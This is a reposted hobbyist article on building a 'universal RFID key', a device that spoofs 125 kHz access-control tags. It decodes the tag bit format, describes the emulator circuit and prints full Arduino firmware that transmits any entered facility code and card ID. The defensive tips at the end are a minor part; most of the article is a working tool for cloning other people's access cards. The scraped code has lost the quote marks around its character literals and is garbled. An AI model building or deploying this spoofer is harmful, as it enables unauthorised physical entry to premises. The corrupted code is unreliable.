码迷,mamicode.com
首页 > 其他好文 > 详细

RFID Emulator -- A Universal RFID Key

时间:2015-09-22 06:33:55      阅读:286      评论:0      收藏:0      [点我收藏+]

标签:

A Universal RFID Key

技术分享

 
RFID projects have been pretty prominent recently, ranging from projects here in Instructables, to our local Silicon Chip magazine in Australia publishing a RFID door lock project in their November issue.  Even I recently purchased a RFID door lock on eBay for $15 to lock my garage (so my front neighbor could get tools if he wanted to).

We have known that the cheaper RFID technologies were pretty insecure for a number of years.  Researchers have demonstrated cloners of all varieties, but simple RFID tags are still being used for access control.  Even my current employer uses them.

A while ago, I was looking at Hack A Day, and I saw an amazing project that somebody had made.  It was an RFID card with a keypad on it.  For the next couple of days, I couldn‘t get the image of the card out of my mind;  the project reminded me of how much I wanted to build a RFID spoofer myself.  The original author didn‘t release source code for their project, but they left enough clues that I could follow. 

So, in typical fashion,  I built my own reader hardware so I could have a look at the data from a card, and created my own version of the Universal RFID key.

The key I made works beautifully both on my garage door, as well as a number of other RFID readers I have tried!

I have decided to publish this, as more people should be aware of the design flaws that are inherent in older RFID implementations, and to allow others to make their own universal key.

Will this key let you into anybodies RFID protected office?  Yes it will, assuming a couple of things are true

  1)  The have to be using 125kHz RFID tags that use the same encoding standard as I have designed this project for, and,
  2)  You have to have access to the number printed on the back of the tag - with that number, you can simply key it into the Universal RFID key, and it will emulate that tag.

So there you go - I hope you enjoy making this project.  - And remember, with great power comes great responsibility!

Step 1: How does RFID work?

技术分享

RFID, or Radio Frequency IDentification is the term used to describe a wide variety of  standards that allow data stored within electronic ‘tags‘ to be read by a reader without using wires.  There are a number of standards, encoding formats, and frequencies in common use.   I will describe the 125 kHz standard that is common for access control mechanisms.

125 kHz RFID tags are commonly encased in a business card sized piece of plastic, or a round disk.  The tag consists of a coil of wire, connected to a microchip.  When the tag is brought into close proximity to a reader, energy is coupled inductively from the reader to the microchip within the tag. 

The energy from the reader has dual use; firstly, it provides power to run the card, and secondly, it provides a communication medium for data to be transmitted.  Once powered up, the tag modulates the bit pattern that is programmed into the tag using a signal that the reader can detect.  The reader then reads this bit pattern, and passes it onto the door controller.  If the bit pattern matches one that is authorised, the door will be unlocked.  If the bit pattern does not match an authorised one, then the door won‘t unlock.

In the RFID system I was playing with, the bit pattern looked like this;

1111111110010111000000000000001111100010111110111101001111010000

I will describe what this pattern actually means in the next page.

One interesting feature of the data transfer between the card and the reader, is that data is encoded using Manchester Encoding, which is a way of encoding data so that it can be transmitted over a single wire ensuring that the clock information is able to be recovered easily.  With Manchester encoding, there is always a transition in the middle of a bit.  If you want to transmit a 1, the transition would be from low to high, and if you want to transmit a 0, the transition would from from high to low.  Because the transitions are in the middle of each bit, you can ensure that you have locked onto valid data.  For a detailed description, have a look a this page.

The actual data is transmitted by the card effectively shorting the coil out - this applies an additional load to the transmitter in the reader, which can be detected.

Step 2: Whats stored on the card?

技术分享

I started by building a RFID card reader (more details in a  future article).  That showed me the data that was being sent when the card transmitted its information.

The RFID cards that I brought have numbers printed on the back of them.  This number says what data the card has included in it.

the card with  0007820706  119,21922 printed on it transmits this pattern:
1111111110010111000000000000001111011110101001010101000010101100

The first set of 111111111 bits are the start sequence - it is used to tell the reader that a code is coming - the reader also uses the sequence to lock onto the card data.

Data stored is transmitted in groups of 4 bits, with a parity bit at the end of every group.

The data can be broken up as follows;
00101 11000 00000 00000 01111 01111 01010 01010 10100 00101 0110                0

If we ignore the parity bit at the end of every nibble we have

0010    1100    0000    0000    0111    0111    0101   0101  1010   0010    0110              0
     2          C        0           0            7          7          5          5           A          2     CHECKSUM   STOP


This code is  2c 0077 55a2  if we break the code into 3 groups, we have 2c, followed by 0077 (which is 119 in decimal), and finally 55A2, which is  21922 in decimal - this corresponds to the 119,21922. 

The same number is also written in another way on these cards 0007820706 (in decimal) is simply the hexadecimal number 7755A2.

WOOT we now understand how the data is stored.

2C is a constant code that is sent with all of the cards.  It is simply a facility identifier for this RFID system.


How does the parity and checksum work?

One final piece of data that the card transmits is a checksum word - this is used to ensure that all of the data has been received successfully.  Firstly, the parity bit at the end of each nibble of data is Even parity - this means that the transmitter will add a 1 to make sure that each block of data has an ‘even‘ number of ‘1‘ bits -  So if we look a the ‘2‘, which is 0010 in binary - the parity system would detect that there was an odd number of ‘1‘ bits, and would add one to compensate.  Compare that to the ‘C‘ which is 1100, the parity system would detect that there are an even number of ‘1‘ bits, so it would add a zero.


00101 2
11000 C
00000 0
00000 0
01111 7
01111 7
01010 5
01010 5
10100 A
00101 2

0110 checksum    + 0 stop bit

Finally, the checksum is an even parity bit applied to each of the vertical row bits.  This way, there is a horizontal and vertical check of every bit sent - everything has to line up, or the reader will simply reject the transmission.

When I decoded the data for my work prox card, it followed a similar sequence here, but (for obvious reasons) I won‘t actually publish the numbers.  Again, part of the sequence was a facility code, and the rest of the sequence held the same number that was printed on the back of the card.

Step 3: How do we emulate a card?

技术分享

So the next step was to identify how to pretend to be a card - I wanted a card that I could type a card number into,

so it had to have a microprocessor on it, was well as a keypad to allow the data to be keyed in.

The ATMega  manipulates the 125kHz RF field by using a bridge rectifier. 

When the output of the micro is low, the diodes in the bridge are allowed to be turned on by the current induced in the coil,  this effectively short it out. 

The reader detects the additional load, and a bit transition is detected.

The job of the micro is simply to turn the output on and off in a way that makes sense to our reader. 

So I created a board that had the micro, a power supply, keypad, and some status LEDs on it.

The attached PDF is the full schematic of the project.

You may notice that c6 is 0pF -  That is intentional  c6 is a placeholder component allowing me to either use a 1000pF surface mount cap, or a 1000pF through hole cap.

The coil is 100 turns of fine wire would on an open former that is just smaller than the card border.

RFIDSpoofer-schematic.pdf

技术分享

Step 4: The Software - Entering data into our card

The software was next. 
 
Using the Arduino IDE,  I implemented a simple menu system that allowed me to enter the relevant facility and CardID data directly from the keypad. 
I also provided a way of displaying the data using the LEDs that I mounted on the board.

One problem I came across, was when I was calculating the card data (parity and checksum) on the fly -
To be read successfully, the card has to output data in real time (most readers need a number of sequential valid reads),
and adding subroutine and calculation delays caused the card to output invalid data as far as the reader was concerned. 
I worked around this problem by populating an array of bits that gets sent when the card is in transmit more. 
That way, the calculations are done only once.

When the card is powered up, it waits for the ‘mode‘ button to be pressed. 
The current mode number is displayed using a set of 4 LEDs. 
Each press on the ‘mode‘ button increments the current mode. 
Once the correct mode is displayed, then the ‘enter‘ key starts that function executing.

MODE 1 - Enter low power (sleep) mode

The card enters a low power mode, waiting for the reset button to be pressed to re-awaken it

MODE 2 - Enter a Hex Facility ID

The card waits for 2 digits to be entered signifying the facility code for this system (In this case, it is 2C) - The software defaults to 2C - so this does not need to be entered.

MODE 3 - Decimal Card ID
The card waits for 8 digits to be entered signifying the CardID for the card to be spoofed (In this case, it is 07820706)  - This is the long number printed on the back of the card, not the 119,21922 number.

MODE 4 - Dump the facility and Card ID
The Facility and Card ID are Dumped as Hex numbers using the 4 Leds at the top of the card.

MODE 5 - Emulate a card
The card enters emulation mode - all LEDs are turned off. 
Emulation mode can only be exited by pressing the reset button.


The software relies on Mark Stanley‘s and Alexander Brevig‘s Keypad Library
http://www.arduino.cc/playground/Code/Keypad
#include <Keypad.h>
#include <stdio.h>
#include <EEPROM.h>
#include <avr/interrupt.h>
#include <avr/io.h>
#include <avr/sleep.h>

// uncomment the following line to get debug information dumped
#define SERIALDEBUG


/***************************************************************************
 *                                                                         *
 *  A Universal RFID Key - Instructables Version                           *
 *                                                                         *
 *   Copyright (C) 2010  Doug Jackson (doug@doughq.com)                    *
 *                                                                         *
 ***************************************************************************
 *                                                                         * 
 * This program is free software; you can redistribute it and/or modify    *
 * it under the terms of the GNU General Public License as published by    *
 * the Free Software Foundation; either version 2 of the License, or       *
 * (at your option) any later version.                                     *
 *                                                                         *
 * This program is distributed in the hope that it will be useful,         *
 * but WITHOUT ANY WARRANTY; without even the implied warranty of          *
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the           *
 * GNU General Public License for more details.                            *
 *                                                                         *
 * You should have received a copy of the GNU General Public License       *
 * along with this program; if not, write to the Free Software             *
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston,                   *
 * MA  02111-1307  USA                                                     *
 *                                                                         *
 ***************************************************************************
 *                                                                         *
 *    * * * * * * * *      W A R N I N G     * * * * * * * * * *           *
 * This project implements what is effectively a universal skeleton key    *
 * for use on a range of RFID access systems.  It is presented for         *
 * educational and demonstration purposes only to enable others to learn   *
 * about the design and limitations of RFID technologies.                  *
 *                                                                         *
 * The Author is not responsible for misuse of the technological system    *
 * implemented by this software - USE AT YOUR OWN RISK!!                   *
 *                                                                         *
 ***************************************************************************
 *
 * 
 * Revision History
 * 
 * Date      By    What
 * 20101002    DRJ    Initial Creation of Arduino Version 
 * 20101024     DRJ     Added facility to arbitrarily enter a facility and 
 *                      UserID number
 * 20101025     DRJ     Added ability to enter decimal UserID
 * 20101124     DRJ     Removed my Work specific functions for public release
 ***************************************************************************
 * 
 *  COMMAND STRUCTURE
 *
 * Mode key is pressed until appropriate mode is displayed on 4 upper leds
 * Enter key triggers action
 *
 * Mode 1 - Sleep (power down till next reset)
 * Mode 2 - Allow HEX facility code to be entered 
 *          2 decimal characters are then read into facility[] array;
 * Mode 3 - Allow Decimal userID to be entered
 *          8 decimal characters are then read into user[] array;
 * Mode 4 - Dump data - Facility code and User code are output on 4 LEDs one byte at a time
 * Mode 5 - Emulate Card
 *
 *
 *************************************************************************************/

#define DATALED1 0
#define DATALED2 1
#define DATALED3 2
#define DATALED4 3
#define STATUSLED1 8
#define STATUSLED2 9

// the Coil is connected to Analog 5 = Digital 19
#define COIL 19


const byte ROWS = 5; //five rows
const byte COLS = 4; //four columns
char keys[ROWS][COLS] = {
  {
    1,2,3,A                  }
  ,
  {
    4,5,6,B                  }
  ,
  {
    7,8,9,C                  }
  ,
  {
    *,0,#,D                  }
  ,
  {
    N,M,F,E                  }
  ,

};
byte rowPins[ROWS] = {
  10, 11, 13, 17, 15}; //connect to the row pinouts of the keypad
byte colPins[COLS] = {
  12, 14, 16, 18}; //connect to the column pinouts of the keypad

byte facility[2]={ 0x02, 0x0C };
byte cardID[8]={ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
int colsum[4]={ 0,0,0,0}; // storage for the column checksums

// delay between symbols when we are transmitting
int bittime=256;

byte RFIDdata[128];


Keypad keypad = Keypad( makeKeymap(keys), rowPins, colPins, ROWS, COLS );

int clock=0;  // storage for the current state of our clock signal.

byte datapointer=0;
byte state;
byte mode=1;


void setup()
{

  pinMode(DATALED1, OUTPUT); 
  pinMode(DATALED2, OUTPUT); 
  pinMode(DATALED3, OUTPUT);  
  pinMode(DATALED4, OUTPUT); 
  pinMode(STATUSLED1, OUTPUT); 
  pinMode(STATUSLED2, OUTPUT); 


  pinMode(COIL, OUTPUT);
  //Start with it LOW  
  digitalWrite(COIL, LOW);

  if (EEPROM.read(0)==0xa5)
  {
      facility[0]=EEPROM.read(1);
      facility[1]=EEPROM.read(2);
      
      cardID[0]=EEPROM.read(3);
      cardID[1]=EEPROM.read(4);
      cardID[2]=EEPROM.read(5);
      cardID[3]=EEPROM.read(6);
      cardID[4]=EEPROM.read(7);
      cardID[5]=EEPROM.read(8);
      cardID[6]=EEPROM.read(9);
      cardID[7]=EEPROM.read(10);
  }
  else
 {
    EEPROM.write(0,0xa5);
    facility[0]=0x02; EEPROM.write(1,facility[0]);  
    facility[1]=0x0c; EEPROM.write(2,facility[1]);
      for (int i=0; i<8; i++) 
    {
      cardID[i]=0; EEPROM.write(i+2,cardID[i]);
    }
  }
    

    #ifdef SERIALDEBUG 
    Serial.begin(9600);  
    delay(200);
    Serial.println("  ");
    Serial.println("RFID Spoofer (c) 2010 D Jackson"); 
    #endif
}

void WriteHeader(void)
{
  // a header consists of 9 one bits
  RFIDdata[datapointer++]=1; 
  RFIDdata[datapointer++]=1;  
  RFIDdata[datapointer++]=1;  
  RFIDdata[datapointer++]=1; 
  RFIDdata[datapointer++]=1; 
  RFIDdata[datapointer++]=1; 
  RFIDdata[datapointer++]=1; 
  RFIDdata[datapointer++]=1; 
  RFIDdata[datapointer++]=1; 
}


void WriteData(byte nibble)
{
  byte data;
  byte rowsum=0;
  for (int i=4; i>0; i--)
  {
    if ((nibble& 1<<i-1) ==0)  
    {
      data=0; 
    }
    else 
    {
      data=1;
      rowsum++;  // increment the checksum value
      colsum[i-1]++; // increment the column checksum
    }


    RFIDdata[datapointer++]= data;
    #ifdef SERIALDEBUG 
      Serial.print((int) data); 
    #endif
     
  }
  // write the row checksum out
  if ((rowsum%2)==0)  
  {
    RFIDdata[datapointer++]=0; 
    #ifdef SERIALDEBUG 
      Serial.print((int)0); 
    #endif
    
  }
  else
  {  
    RFIDdata[datapointer++]=1; 
    #ifdef SERIALDEBUG 
      Serial.print((int)1); 
    #endif
  }

    #ifdef SERIALDEBUG 
      Serial.println(); 
    #endif

}


void WriteChecksum(void)
{
  byte data;
  byte rowsum=0;
  for (int i=4; i>0; i--)
  {
    if ((colsum[i-1]%2) ==0)  
    {
      RFIDdata[datapointer++]=0; 
     #ifdef SERIALDEBUG 
      Serial.print((int)0); 
     #endif
    }
    else
    {
      RFIDdata[datapointer++]=1; 
      #ifdef SERIALDEBUG 
      Serial.print((int) 1); 
      #endif
    }  
  }

  // write the stop bit
  RFIDdata[datapointer++]=0; 

      #ifdef SERIALDEBUG 
      Serial.print((int)0); 
      #endif

}





void BuildCard(void)
{
  // load up the RFID array with card data
  // intitalise the write pointer
  datapointer=0;

  WriteHeader();
  // Write facility
  WriteData(facility[0]);
  WriteData(facility[1]);
 
  // Write cardID
  WriteData(cardID[0]);
  WriteData(cardID[1]);
  WriteData(cardID[2]);
  WriteData(cardID[3]);
  WriteData(cardID[4]);  
  WriteData(cardID[5]);
  WriteData(cardID[6]);  
  WriteData(cardID[7]);

  WriteChecksum();
}


void TransmitManchester(int cycle, int data)
{

  if(cycle ^ data == 1)
  {
    digitalWrite(COIL, HIGH);
  }
  else
  {
    digitalWrite(COIL, LOW);  
  }
}




void writedataLEDS(int temp)
{
  if (temp & 1<<0) digitalWrite(DATALED1,HIGH); 
  else digitalWrite(DATALED1,LOW);
  if (temp & 1<<1) digitalWrite(DATALED2,HIGH); 
  else digitalWrite(DATALED2,LOW);
  if (temp & 1<<2) digitalWrite(DATALED3,HIGH); 
  else digitalWrite(DATALED3,LOW);
  if (temp & 1<<3) digitalWrite(DATALED4,HIGH); 
  else digitalWrite(DATALED4,LOW);   

}



void EmulateCard(void)
{
  #ifdef SERIALDEBUG 
  Serial.println("Emulate Card Entered"); 
  #endif  // enter a low power modewritedataLEDS(0);  // turn off the LEDs
  
  BuildCard();
  
  #ifdef SERIALDEBUG 
  Serial.println(); 
  for(int i = 0; i < 64; i++)
  {
    if (RFIDdata[i]==1) Serial.print("1"); 
    else if (RFIDdata[i]==0) Serial.print("0"); 
    else Serial.print((int)RFIDdata[i]); 
  } 
  Serial.println(); 
  #endif  
  

  while (1==1)
  {
    for(int i = 0; i < 64; i++)
    {
      TransmitManchester(0, RFIDdata[i]);
      delayMicroseconds(bittime);
      TransmitManchester(1, RFIDdata[i]);
      delayMicroseconds(bittime); 
    } 
  }
}

void PowerDown(void)
{
  #ifdef SERIALDEBUG 
  Serial.println("Sleep Mode Entered"); 
  #endif  // enter a low power mode
 
  writedataLEDS(0);  // turn off the LEDs

  set_sleep_mode(SLEEP_MODE_PWR_DOWN);
  sleep_enable();
  sleep_mode();
}





void DumpData(void)
{
  #ifdef SERIALDEBUG 
  Serial.println("Dump Data Entered"); 
  #endif  
  
  // dump the facility and card codes.
  writedataLEDS(0);  // turn off the data LEDs
  for (int i=0; i<2; i++)
  {  
    digitalWrite(STATUSLED1,HIGH);   
    writedataLEDS(facility[i]);
    delay(2000);   
    digitalWrite(STATUSLED1,LOW);
    delay(500); 
  }
  writedataLEDS(0);  // turn off the data LEDs
  digitalWrite(STATUSLED1,LOW);

  for (int i=0; i<8; i++)
  {  
    digitalWrite(STATUSLED2,HIGH);
    writedataLEDS(cardID[i]);
    delay(2000);   
    digitalWrite(STATUSLED2,LOW);
    delay(500); 
  }
  digitalWrite(STATUSLED2,LOW);
  writedataLEDS(mode);
}



void LoadFacility(void)
{
  char key;
  byte temp;

  #ifdef SERIALDEBUG 
  Serial.println("LoadFacility Entered"); 
  #endif  
  
  writedataLEDS(0);  // turn off the data LEDs
  for (int i=0; i<2; i++)
  {  
    writedataLEDS(facility[i]);
    // wait for a keypress
    key = NO_KEY;
    while (key == NO_KEY){
      delay(50);
      key = keypad.getKey();
    }
    switch (key){
      case 0: temp=0; break;
      case 1:  temp=1; break;
      case 2:  temp=2; break;
      case 3:  temp=3; break;
      case 4:  temp=4; break;
      case 5:  temp=5; break;
      case 6:  temp=6; break;
      case 7:  temp=7; break;
      case 8:  temp=8; break;
      case 9:  temp=9; break;
      case A:  temp=0x0a; break;
      case B:  temp=0x0b; break;
      case C:  temp=0x0c; break;
      case D:  temp=0x0d; break;
      case E:  temp=0x0e; break;
      case F:  temp=0x0f; break;
    }   

    digitalWrite(STATUSLED1,HIGH);   
    facility[i]=temp;

    writedataLEDS(facility[i]);
    delay(200);   
    writedataLEDS(0);
    delay(200);   
    writedataLEDS(facility[i]);
    delay(200);
  } 

  writedataLEDS(mode);
  digitalWrite(STATUSLED1,LOW);
  delay(100);
  digitalWrite(STATUSLED1,HIGH);
  for (int i=0; i<2; i++) EEPROM.write(i+1,facility[i]);
  delay(200);
  digitalWrite(STATUSLED1,LOW);
}



void LoadCardID(void){
  char tempchar[9];  // temporary storage for decimal to int conversion
  char key;
  byte temp;
  long decimalval;
 
  #ifdef SERIALDEBUG 
  Serial.println("LoadDecimalCardID Entered");
  #endif
  
  writedataLEDS(0);  // turn off the data LEDs
  for (int i=0; i<8; i++)
  {  
    // wait for a keypress
    key = NO_KEY;
    while (key == NO_KEY){
      delay(50);
      key = keypad.getKey();
    }
    
    tempchar[i]=key;
    
    digitalWrite(STATUSLED2,HIGH);   

    writedataLEDS(tempchar[i]);
    delay(200);   
  } 

  tempchar[8]=\n;
  #ifdef SERIALDEBUG 
    Serial.print("datastring="); Serial.println(tempchar);
  #endif
  decimalval=atol(tempchar);
  #ifdef SERIALDEBUG 
   Serial.print("datalong="); Serial.println((unsigned long)decimalval);
  #endif
   
  sprintf(tempchar,"%4.4X",(decimalval & 0xffff));
  #ifdef SERIALDEBUG 
   Serial.print("dataHEXLO="); 
   Serial.println(tempchar);
  #endif
  for (int i=4; i<8; i++) cardID[i]=asciitohex(tempchar[i-4]);
  
  decimalval = ((decimalval & 0xffff0000) >> 16);
  sprintf(tempchar,"%4.4X",decimalval);
  #ifdef SERIALDEBUG 
   Serial.print("dataHEXHi="); 
   Serial.print(tempchar);
  #endif
  for (int i=0; i<4; i++) cardID[i]=asciitohex(tempchar[i]);
 
  writedataLEDS(mode);
  digitalWrite(STATUSLED2,LOW);
  delay(100);
  digitalWrite(STATUSLED2,HIGH);
  for (int i=0; i<8; i++) EEPROM.write(i+3,cardID[i]);
  delay(200);
  digitalWrite(STATUSLED2,LOW);
}


char asciitohex(char value)  {
    char temp;
    switch (value){
      case 0:  temp=0; break;
      case 1:  temp=1; break;
      case 2:  temp=2; break;
      case 3:  temp=3; break;
      case 4:  temp=4; break;
      case 5:  temp=5; break;
      case 6:  temp=6; break;
      case 7:  temp=7; break;
      case 8:  temp=8; break;
      case 9:  temp=9; break;
      case A:  temp=0x0a; break;
      case B:  temp=0x0b; break;
      case C:  temp=0x0c; break;
      case D:  temp=0x0d; break;
      case E:  temp=0x0e; break;
      case F:  temp=0x0f; break;
    }   
   return temp;
}

   






void loop(void)
{
  char key = keypad.getKey();

  if (key != NO_KEY){

    if (key==M) {  
      mode++;
      if (mode>5) mode=1;
      writedataLEDS(mode);
      delay(100);
      Serial.print("Mode="); 
      Serial.println((int)mode);
    }

    if (key==N)  {   // enter key pressed - dofunction
      switch (mode){
      case 1:
        PowerDown();    // power down mode 
        break;
      case 2:
        LoadFacility(); // allow user to enter facility data
        break;
      case 3:
        LoadCardID();   // allow user to enter the card id
        break;
      case 4:
        DumpData();     // display the card data
        break;
      case 5: 
        EmulateCard();  // start card emulation
        break;
      } 
      #ifdef SERIALDEBUG 
       Serial.println(key); 
      #endif  
    }
  }
}          

 RFIDSpoofer_Instructables.pde

Step 9: Further steps

This was a ‘to prove I could do it‘ project - I have completed it, so it now sits on my shelf at work to remind others that simple RFID systems are simply not secure.

You are welcome to adapt the project however you would like to, and while you may have the skeleton keys to the kingdom, you still need the little numbers on the back of the access card before you can use the key yourself.

I have considered modifying my card so that it works as all of the compatible RFID tags that I hold.  In my job, I need have access to multiple work sites, and it would be great to use the one card, but I don‘t think that would be a great idea..........


Will this work on all RFID sytems?

No it won‘t. This is a good thing.

The first RFID systems deployed years ago used very simple protocols, based on the intelligence of the chip in the card - They also used a low frequency (125kHz) carrier.

More modern systems use a number of techniques to ensure security, such as one time codes; cryptography; use bi-directional communication; use internal passwords, and use much higher frequencies. So spoofing these systems is a lot more work.

But there are a large number of low tech systems in place now.


What can I do to protect my system?

Firstly, don‘t equate cards to physical keys - in simple systems they are not equivalent.

Don‘t give out visitor cards - They are easily duplicated - I f you do need Visitor cards, then implement a system where they are only active when they have been issued.

Enable Pass Back systems - If the card system believes you are in a particular room, make sure that the card can‘t be used in other rooms at the same time.

Remove the numbers from the back of the cards - while they may make it easier to enter card details, but they also make it easy for somebody to use the details for their own purposes.

Finally, look at how to upgrade your access system to a card system that is not trivially spoofed using $15 worth of parts.  And - No, purchasing a new system from eBay for $15 is not the answer....

 

 

 

RFID Emulator -- A Universal RFID Key

标签:

原文地址:http://www.cnblogs.com/shangdawei/p/4827815.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!